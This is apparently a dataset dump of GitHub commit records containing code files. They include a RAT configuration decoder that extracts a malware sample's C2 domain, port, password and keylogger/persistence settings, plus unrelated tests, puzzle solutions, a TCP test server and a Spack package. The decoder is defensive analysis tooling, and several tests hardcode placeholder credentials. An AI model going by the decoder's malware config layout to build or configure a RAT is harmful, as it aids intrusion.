commit stringlengths 40 40 | subject stringlengths 4 1.73k | repos stringlengths 5 127k | old_file stringlengths 2 751 | new_file stringlengths 2 751 | new_contents stringlengths 1 8.98k | old_contents stringlengths 0 6.59k | license stringclasses 13
values | lang stringclasses 23
values |
|---|---|---|---|---|---|---|---|---|
55637514e578421e749f90f1ae8bd782831abffb | Add ClientMesh Decoder | kevthehermit/RATDecoders | malwareconfig/decoders/clientmesh.py | malwareconfig/decoders/clientmesh.py | from base64 import b64decode
from malwareconfig.common import Decoder
from malwareconfig.common import string_printable
class ClientMesh(Decoder):
decoder_name = "ClientMesh"
decoder__version = 1
decoder_author = "@kevthehermit"
decoder_description = "ClientMesh Decoder"
def __init__(self):
self.config = {}
def get_config(self):
'''
This is the main entry
:return:
'''
file_data = self.file_info.file_data
splits = file_data.split(b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7e')
config_data = b64decode(splits[-1]).decode('utf-8')
fields = config_data.split('``')
config_dict = {
'Domain': fields[0],
'Port': fields[1],
'Password': fields[2],
'CampaignID': fields[3],
'MsgBoxFlag': fields[4],
'MsgBoxTitle': fields[5],
'MsgBoxText': fields[6],
'Startup': fields[7],
'RegistryKey': fields[8],
'RegistryPersistance': fields[9],
'LocalKeyLogger': fields[10],
'VisibleFlag': fields[11],
'Unknown': fields[12]
}
# Set the config to the class for use
self.config = config_dict
| mit | Python | |
0018765068ed533bed6adaa33a7634c104850034 | Create RomanToInt_001.py | Chasego/cod,cc13ny/algo,Chasego/codi,cc13ny/algo,Chasego/cod,Chasego/cod,cc13ny/algo,cc13ny/algo,Chasego/codi,Chasego/codirit,cc13ny/Allin,Chasego/codi,Chasego/cod,Chasego/codirit,Chasego/codi,Chasego/codirit,Chasego/codirit,cc13ny/Allin,cc13ny/algo,Chasego/codirit,Chasego/cod,cc13ny/Allin,Chasego/codi,cc13ny/Allin,cc13ny/Allin | leetcode/013-Roman-to-Integer/RomanToInt_001.py | leetcode/013-Roman-to-Integer/RomanToInt_001.py | class Solution(object):
def romanToInt(self, s):
"""
:type s: str
:rtype: int
"""
r2i = {'I':1, 'V':5, 'X':10, 'L':50,
'C':100, 'D':500, 'M':1000}
res = 0
for i in range(len(s)):
if i == len(s) - 1 or r2i[s[i]] >= r2i[s[i + 1]]:
res += r2i[s[i]]
else:
res -= r2i[s[i]]
return res
| mit | Python | |
709229c8126a532ca6813298b0d90515a5c1ad9d | test to submit file to databank | dataflow/DataStage,dataflow/DataStage,dataflow/DataStage | test/FileShare/tests/OXDSDataset.py | test/FileShare/tests/OXDSDataset.py | # ---------------------------------------------------------------------
#
# Copyright (c) 2012 University of Oxford
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, --INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# ---------------------------------------------------------------------
from __future__ import with_statement
import logging
import urlparse
import sys,os
import tempfile
import urllib
import urllib2
import zipfile
import unittest
import rdflib
import xattr
sys.path.append("../..")
from datastage.namespaces import OXDS, DCTERMS, RDF, FOAF, bind_namespaces
from datastage.dataset.base import Dataset
import datastage.util.serializers
from datastage.util.multipart import MultiPartFormData
logger = logging.getLogger(__name__)
class OXDSDataset(unittest.TestCase):
logger.debug("Starting transfer to repository")
def setUp(self):
return
def tearDown(self):
return
def get_opener(self):
password_manager = urllib2.HTTPPasswordMgrWithDefaultRealm()
password_manager.add_password(None,urlparse.urlparse('http://databank/datastage/')._replace(path='/').geturl(),'admin','test')
basic_auth_handler = PreemptiveBasicAuthHandler(password_manager)
opener = urllib2.build_opener(basic_auth_handler)
return opener
def testMe(self):
fname = "/tmp/a.txt"
stat_info = os.stat(fname)
with open(fname, 'rb') as fileData:
opener = self.get_opener()
data = MultiPartFormData(files=[{'name': 'file','filename': fname,'stream': fileData,'mimetype': 'text/plain','size': stat_info.st_size}])
#data = MultiPartFormData(files=[{'name': 'file','filename': fname,'stream': fileData,'mimetype': 'text/plain','size': stat_info.st_size,'Content-type': data.content_type,'Content-length': data.content_length}])
opener.open('http://databank/datastage/'+ 'datasets/' + 'dd', data=data, method='POST',headers={'Content-type': data.content_type,'Content-length': data.content_length})
return
class PreemptiveBasicAuthHandler(urllib2.HTTPBasicAuthHandler):
def https_request(self, request):
credentials = self.passwd.find_user_password(None, request.get_full_url())
if all(credentials):
request.add_header(self.auth_header, 'Basic %s' % base64.b64encode(':'.join(credentials)))
return request
# Assemble test suite
from MiscLib import TestUtils
def getTestSuite(select="unit"):
testdict = {
"unit":
[
],
"component":
[ "testMe"
],
"integration":
[ "testIntegration"
],
"pending":
[ "testPending"
]
}
return TestUtils.getTestSuite(OXDSDataset, testdict, select=select)
# Run unit tests directly from command line
if __name__ == "__main__":
TestUtils.runTests("OXDSDataset", getTestSuite, sys.argv)
# End.
| mit | Python | |
180cae4ec364cf1b2bf9d1f733999a538c5f516f | Create test-events.py | arienchen/pytibrv | test/python/test-events.py | test/python/test-events.py | import datetime
import time
from tibrv.tport import *
from tibrv.status import *
from tibrv.tport import *
from tibrv.events import *
from tibrv.disp import *
import unittest
class EventTest(unittest.TestCase, TibrvMsgCallback):
@classmethod
def setUpClass(cls):
status = Tibrv.open()
if status != TIBRV_OK:
raise TibrvError(status)
@classmethod
def tearDownClass(cls):
Tibrv.close()
def callback(self, event: TibrvEvent, msg: TibrvMsg, closure):
print('RECV [{}] < {}'.format(msg.sendSubject, str(msg)))
self.msg_recv = msg
# detech from TIBRV, must destroy later
status = msg.detach()
self.assertEqual(TIBRV_OK, status, TibrvStatus.text(status))
def test_create(self):
tx = TibrvTx()
status = tx.create(None, None, None)
self.assertEqual(TIBRV_OK, status, TibrvStatus.text(status))
que = TibrvQueue()
status = que.create('TEST')
self.assertEqual(TIBRV_OK, status, TibrvStatus.text(status))
# Create an INBOX
subj = tx.inbox()
lst = TibrvListener()
status = lst.create(que, self, tx, subj)
self.assertEqual(TIBRV_OK, status, TibrvStatus.text(status))
disp = TibrvDispatcher()
status = disp.create(que)
self.assertEqual(TIBRV_OK, status, TibrvStatus.text(status))
m = TibrvMsg()
m.setStr('DATA', 'TEST')
print('')
self.msg_recv = None
status = tx.send(m, subj)
self.timeout = time.time() + 10000
while time.time() <= self.timeout:
if self.msg_recv is not None:
break
time.sleep(0.1)
#print('SLEEP...')
self.assertIsNotNone(self.msg_recv)
self.assertEqual(m.getStr('DATA'), self.msg_recv.getStr('DATA'))
del self.msg_recv
del m
del disp
del lst
del que
del tx
if __name__ == "__main__" :
unittest.main(verbosity=2)
| bsd-3-clause | Python | |
95fdd1f96ad4d54fb75ea134ea2195808d4c1116 | Add python script to check big-O notation | prabhugs/scripts,prabhugs/scripts | bigO.py | bigO.py | import timeit
import random
for i in range (10000, 100000, 20000):
t = timeit.Timer("random.randrange(%d) in x"%i, "from __main__ import random, x")
x = list(range(i))
list_time = t.timeit(number = 1000)
x = {j:None for j in range(i)}
dict_time = t.timeit(number = 1000)
print "Counter: " + str(i) + " List: " + str(list_time) + " Dict: " + str(dict_time)
| mit | Python | |
a0ae12ddf581eb77af5ce5c6498c26745bd2cfcb | Add script to extract code/data size after make examples. | jfpoilpret/fast-arduino-lib,jfpoilpret/fast-arduino-lib,jfpoilpret/fast-arduino-lib,jfpoilpret/fast-arduino-lib | stats.py | stats.py | #!/usr/bin/python
# encoding: utf-8
from __future__ import with_statement
import argparse, re, sys
def filter(args):
bytes_extractor = re.compile(r"([0-9]+) bytes")
with args.output:
with args.input:
for line in args.input:
if line.startswith("avr-size"):
# Find example name (everything after last /)
example = line[line.rfind("/") + 1:-1]
elif line.startswith("Program:"):
# Find number of bytes of flash
matcher = bytes_extractor.search(line)
program = matcher.group(1)
elif line.startswith("Data:"):
# Find number of bytes of SRAM
matcher = bytes_extractor.search(line)
data = matcher.group(1)
# Write new line to output
args.output.write("%s\t%s\t%s\n" % (example, program, data))
if __name__ == "__main__":
parser = argparse.ArgumentParser(description = 'XXXXXXXX')
parser.add_argument('input', nargs='?', type=argparse.FileType('r'), default=sys.stdin)
parser.add_argument('output', nargs='?', type=argparse.FileType('w'), default=sys.stdout)
args = parser.parse_args()
filter(args)
| lgpl-2.1 | Python | |
23080dfea3ce6997c1cbd784da674902aa8a8cbe | test looping from Ingenico format, through pBER and back to Ingenico | mmattice/pyemvtlv | test/test_loop_ingenico.py | test/test_loop_ingenico.py | from pyemvtlv.codec.ingenico import decoder as ingdec
from pyemvtlv.codec.ingenico import encoder as ingenc
from pyemvtlv.codec.binary import decoder as berdec
from pyemvtlv.codec.binary import encoder as berenc
from binascii import hexlify
import unittest
class RecodeTestCase(unittest.TestCase):
def testFull(self):
return None
self.startstring = 'T4F:07:hA0000000031010<FS>T57:13:h4888930000000000D00000000000000000000F<FS>T82:02:h1C00<FS>T84:07:hA0000000031010<FS>T95:05:h8000000000<FS>T9A:03:h160114<FS>T9B:02:h6800<FS>T9C:01:h00<FS>T5F2A:02:h0840<FS>T5F34:01:h00<FS>T9F02:06:h000000000215<FS>T9F03:06:h000000000000<FS>T9F06:07:hA0000000031010<FS>T9F09:02:h008C<FS>T9F10:07:h06010A03A0A000<FS>T9F11:01:h01<FS>T9F1A:02:h0840<FS>T9F21:03:h171335<FS>T9F26:08:h2777D84D51E607C4<FS>T9F27:01:h80<FS>T9F33:03:hE0F8C8<FS>T9F34:03:h1E0300<FS>T9F35:01:h22<FS>T9F36:02:h0032<FS>T9F37:04:h980D0885<FS>T9F39:01:h05<FS>T9F40:05:hF000F0A001<FS>T9F41:04:h00000042<FS>T9F53:01:h52<FS>'.replace('<FS>', '\x1c') # T50:0B:aVisa Credit<FS>T9F1E:08:a80330127<FS>
subs = self.startstring
ingdecodelist = []
while subs:
y, subs = ingdec.decode(subs)
ingdecodelist.append(y)
berencodelist = []
for y in ingdecodelist:
berencodelist.append(berenc.encode(y))
subs = ''.join(berencodelist)
berdecodelist = []
while subs:
y, subs = berdec.decode(subs)
berdecodelist.append(y)
ingencodelist = []
for y in berdecodelist:
ingencodelist.append(ingenc.encode(y))
teststring = ''.join(ingencodelist)
self.assertEqual(self.startstring, teststring)
def testSingle(self):
self.startstring = 'T4F:07:hA0000000031010<FS>T57:13:h4888930000000000D00000000000000000000F<FS>T82:02:h1C00<FS>T84:07:hA0000000031010<FS>T95:05:h8000000000<FS>T9A:03:h160114<FS>T9B:02:h6800<FS>T9C:01:h00<FS>T5F2A:02:h0840<FS>T5F34:01:h00<FS>T9F02:06:h000000000215<FS>T9F03:06:h000000000000<FS>T9F06:07:hA0000000031010<FS>T9F09:02:h008C<FS>T9F10:07:h06010A03A0A000<FS>T9F11:01:h01<FS>T9F1A:02:h0840<FS>T9F21:03:h171335<FS>T9F26:08:h2777D84D51E607C4<FS>T9F27:01:h80<FS>T9F33:03:hE0F8C8<FS>T9F34:03:h1E0300<FS>T9F35:01:h22<FS>T9F36:02:h0032<FS>T9F37:04:h980D0885<FS>T9F39:01:h05<FS>T9F40:05:hF000F0A001<FS>T9F41:04:h00000042<FS>T9F53:01:h52<FS>'.replace('<FS>', '\x1c') # T50:0B:aVisa Credit<FS>T9F1E:08:a80330127<FS>
sep = '\x1c'
substrates = (x + sep for x in self.startstring.split(sep))
for subs in substrates:
if subs == sep:
continue
results = []
a, remainder = ingdec.decode(subs)
results.append(a)
self.assertEquals(remainder, '')
b = berenc.encode(a)
results.append(hexlify(b))
c, remainder = berdec.decode(b)
results.append(c)
self.assertEquals(remainder, '')
d = ingenc.encode(c)
results.append(d)
if subs != d:
print results
self.assertEqual(subs, d)
if __name__ == '__main__':
unittest.main()
| bsd-3-clause | Python | |
31e7415f29d22d3ecf709fc0a447c95232b0e294 | Create server.py | filip-marinic/LGS_SimSuite | server.py | server.py | #!/usr/bin/env python
# LGS SimSuite Server
#Copyright (c) 2015 Filip Marinic
from time import sleep, gmtime, strftime
import socket
import math
import sys
TCP_S_IP = '0.0.0.0'
BUFFER_SIZE = 10
FRAME_ID = 1000000000
frames_sent = 0
MESSAGE = "_9HXuFd6BoQGA0t5nvoLfOBUhP9rKGCFKPUG6JvFfBr6zJZDwzHlgTyCoBk04sxPQEaQ20PoeyRtYcZwETCusXclo8K1cvb9eqtc34zAGfF3b4KQDkTv3yobKHwUZUTwiCGXfzqO9gYvFTZAuHJCX2imLo4KzILiyQn97zFAhm2jj8Al4PC6ZKQDveGkO8WMM6EWVOJpjtkpewq7BhknLkqUtYSKUDiEbNShKGn1uzaupMAhtovSgYSsPo6baCnFRD3fy9gxQp8mK63wbeT9umnmrSipY3j9mvyszJviiQnXmkb3kaGrSTuTuVwwQIh7KtYRHORWn0G0rF7irQX9OJVWEQQXFAGc6323QhIfNudhHJgczC2HSyDCjPZG3aqKHYXUL9ndqt66QCgsplXyoSfIf6cZ84lzcN7ssGfG6GJIX6GTQ1bavjhuUvJofdYXF1N2rXONxOtgXcdbGksRcm3fN0gTeqO0l2cnMPRYOAv4s4xHs469tC0xKTsKky5Fu15LXohKIVeW0VyPEr4stZdIqdhfyTXcbLHjNjvXPGt5DM7Z4DS6NCcSwVodcBOrELkACd6SEqwNuMe9HXuFd6BoQGA0t5nvoLfOBUhP9rKGCFKPUG6JvFfBr6zJZDwzHlgTyCoBk04sxPQEaQ20PoeyRtYcZwETCusXclo8K1cvb9eqtc34zAGfF3b4KQDkTv3yobKHwUZUTwiCGXfzqO9gYvFTZAuHJCX2imLo4KzILiyQn97zFAhm2jj8Al4PC6ZKQDveGkO8WMM6EWVOJpjtkpewq7BhknLkqUtYSKUDiEbNShKGn1uzaupMAhtovSgYSsPo6baCnFRD3fy9gxQp8mK63wbeT9umnmrSipY3j9mvyszJviiQnXmkb3kaGrSTuTuVwwQIh7KtYRHORWn0G0rF7irQX9OJVWEQQXFAGc6323QhIfNudhHJgczC2HSyDCjPZG3aqKHYXUL9ndqt66QCgsplXyoSfIf6cZ84lzcN7ssGfG6GJIX6GTQ1bavjhuUvJofdYXF1N2rXONxOtgXcdbGksRcm3fN0gTeqO0l2cnMPRYOAv4s4xHs469tC0xKTsKky5Fu15LXohKIVeW0VyPEr4stZdIqdhfyTXcbLHjNjvXPGt5DM7Z4DS6NCcSwVodcBOrELkACd6SEqwNuMey5Fu15LXohKIVeW0VyPEr4stZdIqdhfyTXcbLHjNjvXPGt5DM7Z4DS6NCcSwVodcBOrELkACd6SEqwNuMejvXPr63"
try:
try:
if len(sys.argv) > 2:
TCP_S_PORT = int(sys.argv[1])
if int(sys.argv[2]) > 0 : period = float(1300/((float(sys.argv[2])*1000)/8)) #Frame size divided by Bytes/s
else : period = 0
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 240000)
s.bind((TCP_S_IP, TCP_S_PORT))
s.listen(True)
except:
print "Cannot open port for listening."
sys.exit(1)
while True:
conn, addr = s.accept()
packet = conn.recv(BUFFER_SIZE, socket.MSG_WAITALL)
if packet :
received_message = packet[:10]
if received_message == "terminated":
conn.close()
frames_requested = 0
else :
frames_requested = int(received_message) - 1000000000
else : frames_requested = 0
timestamp = strftime("%d/%m/%Y-%H:%M:%S", gmtime())
if frames_requested > 0 :
print "\nFrames requested: ", frames_requested
print "Initiating transfer..."
while ((FRAME_ID - 1000000000) < frames_requested):
FRAME_ID += 1
timestamp = "_" + strftime("%d/%m/%Y-%H:%M:%S", gmtime())
PACKET = str(FRAME_ID) + timestamp + MESSAGE
frames_sent += 1
conn.send(PACKET)
sleep(period)
print "Total frames sent: ", frames_sent
frames_requested = 0
FRAME_ID = 1000000000
frames_sent = 0
except (KeyboardInterrupt):
conn.close()
s.close()
sys.exit(1)
| mit | Python | |
151a5a64aa5d0e3a2b4e63c7f07916efa087b8a2 | Create car-fleet.py | tudennis/LeetCode---kamyu104-11-24-2015,tudennis/LeetCode---kamyu104-11-24-2015,kamyu104/LeetCode,kamyu104/LeetCode,tudennis/LeetCode---kamyu104-11-24-2015,kamyu104/LeetCode,tudennis/LeetCode---kamyu104-11-24-2015,tudennis/LeetCode---kamyu104-11-24-2015,kamyu104/LeetCode,kamyu104/LeetCode | Python/car-fleet.py | Python/car-fleet.py | # Time: O(nlogn)
# Space: O(n)
# N cars are going to the same destination along a one lane road.
# The destination is target miles away.
#
# Each car i has a constant speed speed[i] (in miles per hour),
# and initial position position[i] miles towards the target along the road.
#
# A car can never pass another car ahead of it,
# but it can catch up to it, and drive bumper to bumper at the same speed.
#
# The distance between these two cars is ignored - they are assumed to
# have the same position.
#
# A car fleet is some non-empty set of cars driving at the same position
# and same speed.
# Note that a single car is also a car fleet.
#
# If a car catches up to a car fleet right at the destination point,
# it will still be considered as one car fleet.
#
# How many car fleets will arrive at the destination?
#
# Example 1:
#
# Input: target = 12, position = [10,8,0,5,3], speed = [2,4,1,1,3]
# Output: 3
# Explanation:
# The cars starting at 10 and 8 become a fleet, meeting each other at 12.
# The car starting at 0 doesn't catch up to any other car, so it is a fleet
# by itself.
# The cars starting at 5 and 3 become a fleet, meeting each other at 6.
# Note that no other cars meet these fleets before the destination,
# so the answer is 3.
#
# Note:
# - 0 <= N <= 10 ^ 4
# - 0 < target <= 10 ^ 6
# - 0 < speed[i] <= 10 ^ 6
# - 0 <= position[i] < target
# - All initial positions are different.
class Solution(object):
def carFleet(self, target, position, speed):
"""
:type target: int
:type position: List[int]
:type speed: List[int]
:rtype: int
"""
times = [float(target-p)/s for p, s in sorted(zip(position, speed))]
result, curr = 0, 0
for t in reversed(times):
if t > curr:
result += 1
curr = t
return result
| mit | Python | |
67d7f3fc03c6bc031f73b53348b140e7f24567c1 | Add opennurbs package (#6570) | krafczyk/spack,LLNL/spack,tmerrick1/spack,tmerrick1/spack,matthiasdiener/spack,tmerrick1/spack,mfherbst/spack,tmerrick1/spack,LLNL/spack,krafczyk/spack,iulian787/spack,matthiasdiener/spack,matthiasdiener/spack,iulian787/spack,mfherbst/spack,EmreAtes/spack,krafczyk/spack,krafczyk/spack,mfherbst/spack,krafczyk/spack,mfherbst/spack,matthiasdiener/spack,iulian787/spack,EmreAtes/spack,EmreAtes/spack,tmerrick1/spack,matthiasdiener/spack,LLNL/spack,EmreAtes/spack,LLNL/spack,iulian787/spack,LLNL/spack,mfherbst/spack,iulian787/spack,EmreAtes/spack | var/spack/repos/builtin/packages/opennurbs/package.py | var/spack/repos/builtin/packages/opennurbs/package.py | ##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the LICENSE file for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
import glob
class Opennurbs(Package):
"""OpenNURBS is an open-source NURBS-based geometric modeling library
and toolset, with meshing and display / output functions.
"""
homepage = "https://github.com/OpenNURBS/OpenNURBS"
url = "https://github.com/OpenNURBS/OpenNURBS.git"
maintainers = ['jrood-nrel']
version('develop',
git='https://github.com/OpenNURBS/OpenNURBS.git',
branch='develop')
version('percept', '59163fd085a24c7a4c2170c70bb60fea',
url='https://github.com/PerceptTools/percept/raw/master/build-cmake/opennurbs-percept.tar.gz')
variant('shared', default=True,
description="Build shared libraries")
# CMake installation method
def install(self, spec, prefix):
cmake_args = [
'-DBUILD_SHARED_LIBS:BOOL=%s' % (
'ON' if '+shared' in spec else 'OFF')
]
cmake_args.extend(std_cmake_args)
with working_dir('spack-build', create=True):
cmake('..', *cmake_args)
make()
make('install')
# Pre-cmake installation method
@when('@percept')
def install(self, spec, prefix):
make(parallel=False)
# Install manually
mkdir(prefix.lib)
mkdir(prefix.include)
install('libopenNURBS.a', prefix.lib)
install_tree('zlib', join_path(prefix.include, 'zlib'))
headers = glob.glob(join_path('.', '*.h'))
for h in headers:
install(h, prefix.include)
| lgpl-2.1 | Python | |
d7eaf7c3010b7cec0ef53f033badaa11748224e7 | add link test | echinopsii/net.echinopsii.ariane.community.cli.python3 | tests/acceptance/mapping/link_at.py | tests/acceptance/mapping/link_at.py | # Ariane CLI Python 3
# Link acceptance tests
#
# Copyright (C) 2015 echinopsii
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import unittest
from ariane_clip3.mapping import MappingService, Node, Container, Endpoint, EndpointService, Transport, Link, \
LinkService
__author__ = 'mffrench'
class LinkTest(unittest.TestCase):
def setUp(self):
args = {'type': 'REST', 'base_url': 'http://localhost:6969/ariane/', 'user': 'yoda', 'password': 'secret'}
MappingService(args)
self.container1 = Container(name="test_container1", gate_uri="ssh://my_host/docker/test_container1",
primary_admin_gate_name="container name space (pid)", company="Docker",
product="Docker", c_type="container")
self.container1.save()
self.node1 = Node(name="mysqld", container_id=self.container1.cid)
self.node1.save()
self.endpoint1 = Endpoint(url="mysql://test_container1:4385", parent_node_id=self.node1.nid)
self.endpoint1.save()
self.container2 = Container(name="test_container2", gate_uri="ssh://my_host/docker/test_container2",
primary_admin_gate_name="container name space (pid)", company="Docker",
product="Docker", c_type="container")
self.container2.save()
self.node2 = Node(name="mysql.cli", container_id=self.container2.cid)
self.node2.save()
self.endpoint2 = Endpoint(url="mysql://test_container2:12385", parent_node_id=self.node1.nid)
self.endpoint2.save()
self.transport = Transport(name="transport_test")
self.transport.save()
def tearDown(self):
self.endpoint1.remove()
self.endpoint2.remove()
self.node1.remove()
self.node2.remove()
self.container1.remove()
self.container2.remove()
def test_create_remove_link_basic(self):
link = Link(source_endpoint_id=self.endpoint1.id, target_endpoint_id=self.endpoint2.id,
transport_id=self.transport.id)
link.save()
self.assertIsNotNone(link.id)
self.assertIsNone(link.remove())
def test_find_link_by_id(self):
link = Link(source_endpoint_id=self.endpoint1.id, target_endpoint_id=self.endpoint2.id,
transport_id=self.transport.id)
link.save()
self.assertIsNotNone(LinkService.find_link(lid=link.id))
link.remove()
self.assertIsNone(LinkService.find_link(lid=link.id))
def test_get_links(self):
init_link_count = LinkService.get_links().__len__()
link = Link(source_endpoint_id=self.endpoint1.id, target_endpoint_id=self.endpoint2.id,
transport_id=self.transport.id)
link.save()
self.assertEqual(LinkService.get_links().__len__(), init_link_count + 1)
link.remove()
self.assertEqual(LinkService.get_links().__len__(), init_link_count) | agpl-3.0 | Python | |
aa2ddd886cc344889b53eed2ca8102fe5dc0aed4 | Make tf_saved_model/debug_info.py a bit more strict. | annarev/tensorflow,frreiss/tensorflow-fred,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow,paolodedios/tensorflow,arborh/tensorflow,arborh/tensorflow,sarvex/tensorflow,davidzchen/tensorflow,renyi533/tensorflow,xzturn/tensorflow,Intel-tensorflow/tensorflow,freedomtan/tensorflow,gunan/tensorflow,paolodedios/tensorflow,petewarden/tensorflow,annarev/tensorflow,freedomtan/tensorflow,yongtang/tensorflow,karllessard/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,Intel-Corporation/tensorflow,adit-chandra/tensorflow,Intel-Corporation/tensorflow,karllessard/tensorflow,yongtang/tensorflow,tensorflow/tensorflow-pywrap_saved_model,jhseu/tensorflow,renyi533/tensorflow,xzturn/tensorflow,davidzchen/tensorflow,gautam1858/tensorflow,gunan/tensorflow,aldian/tensorflow,ppwwyyxx/tensorflow,Intel-tensorflow/tensorflow,adit-chandra/tensorflow,Intel-Corporation/tensorflow,freedomtan/tensorflow,petewarden/tensorflow,tensorflow/tensorflow-pywrap_saved_model,gunan/tensorflow,cxxgtxy/tensorflow,paolodedios/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,jhseu/tensorflow,adit-chandra/tensorflow,gunan/tensorflow,aldian/tensorflow,karllessard/tensorflow,petewarden/tensorflow,xzturn/tensorflow,davidzchen/tensorflow,annarev/tensorflow,jhseu/tensorflow,jhseu/tensorflow,Intel-tensorflow/tensorflow,freedomtan/tensorflow,arborh/tensorflow,cxxgtxy/tensorflow,ppwwyyxx/tensorflow,sarvex/tensorflow,paolodedios/tensorflow,aldian/tensorflow,adit-chandra/tensorflow,petewarden/tensorflow,arborh/tensorflow,davidzchen/tensorflow,davidzchen/tensorflow,Intel-tensorflow/tensorflow,petewarden/tensorflow,karllessard/tensorflow,tensorflow/tensorflow,sarvex/tensorflow,Intel-Corporation/tensorflow,renyi533/tensorflow,frreiss/tensorflow-fred,ppwwyyxx/tensorflow,Intel-tensorflow/tensorflow,gautam1858/tensorflow,adit-chandra/tensorflow,Intel-tensorflow/tensorflow,yongtang/tensorflow,sarvex/tensorflow,jhseu/tensorflow,gautam1858/tensorflow,davidzchen/tensorflow,renyi533/tensorflow,frreiss/tensorflow-fred,gunan/tensorflow,jhseu/tensorflow,ppwwyyxx/tensorflow,tensorflow/tensorflow,gunan/tensorflow,jhseu/tensorflow,renyi533/tensorflow,freedomtan/tensorflow,davidzchen/tensorflow,tensorflow/tensorflow,paolodedios/tensorflow,gautam1858/tensorflow,gunan/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,Intel-tensorflow/tensorflow,tensorflow/tensorflow-pywrap_saved_model,frreiss/tensorflow-fred,gautam1858/tensorflow,adit-chandra/tensorflow,Intel-Corporation/tensorflow,tensorflow/tensorflow,yongtang/tensorflow,aldian/tensorflow,adit-chandra/tensorflow,annarev/tensorflow,karllessard/tensorflow,tensorflow/tensorflow-pywrap_saved_model,yongtang/tensorflow,annarev/tensorflow,ppwwyyxx/tensorflow,paolodedios/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,annarev/tensorflow,Intel-Corporation/tensorflow,karllessard/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,aam-at/tensorflow,tensorflow/tensorflow-pywrap_saved_model,ppwwyyxx/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,paolodedios/tensorflow,gunan/tensorflow,tensorflow/tensorflow-pywrap_saved_model,frreiss/tensorflow-fred,gautam1858/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,aam-at/tensorflow,cxxgtxy/tensorflow,arborh/tensorflow,xzturn/tensorflow,gautam1858/tensorflow,gunan/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow,freedomtan/tensorflow,renyi533/tensorflow,jhseu/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,xzturn/tensorflow,arborh/tensorflow,karllessard/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,arborh/tensorflow,arborh/tensorflow,adit-chandra/tensorflow,tensorflow/tensorflow-pywrap_saved_model,davidzchen/tensorflow,aldian/tensorflow,xzturn/tensorflow,xzturn/tensorflow,jhseu/tensorflow,paolodedios/tensorflow,petewarden/tensorflow,gautam1858/tensorflow,petewarden/tensorflow,yongtang/tensorflow,cxxgtxy/tensorflow,cxxgtxy/tensorflow,sarvex/tensorflow,ppwwyyxx/tensorflow,aam-at/tensorflow,freedomtan/tensorflow,karllessard/tensorflow,petewarden/tensorflow,Intel-Corporation/tensorflow,karllessard/tensorflow,jhseu/tensorflow,annarev/tensorflow,yongtang/tensorflow,tensorflow/tensorflow-pywrap_saved_model,tensorflow/tensorflow-pywrap_saved_model,Intel-Corporation/tensorflow,davidzchen/tensorflow,tensorflow/tensorflow,renyi533/tensorflow,Intel-tensorflow/tensorflow,jhseu/tensorflow,arborh/tensorflow,Intel-tensorflow/tensorflow,karllessard/tensorflow,renyi533/tensorflow,aam-at/tensorflow,aldian/tensorflow,adit-chandra/tensorflow,freedomtan/tensorflow,petewarden/tensorflow,gunan/tensorflow,paolodedios/tensorflow,gautam1858/tensorflow,annarev/tensorflow,renyi533/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,frreiss/tensorflow-fred,davidzchen/tensorflow,cxxgtxy/tensorflow,renyi533/tensorflow,yongtang/tensorflow,freedomtan/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,aam-at/tensorflow,gautam1858/tensorflow,frreiss/tensorflow-fred,adit-chandra/tensorflow,arborh/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,frreiss/tensorflow-fred,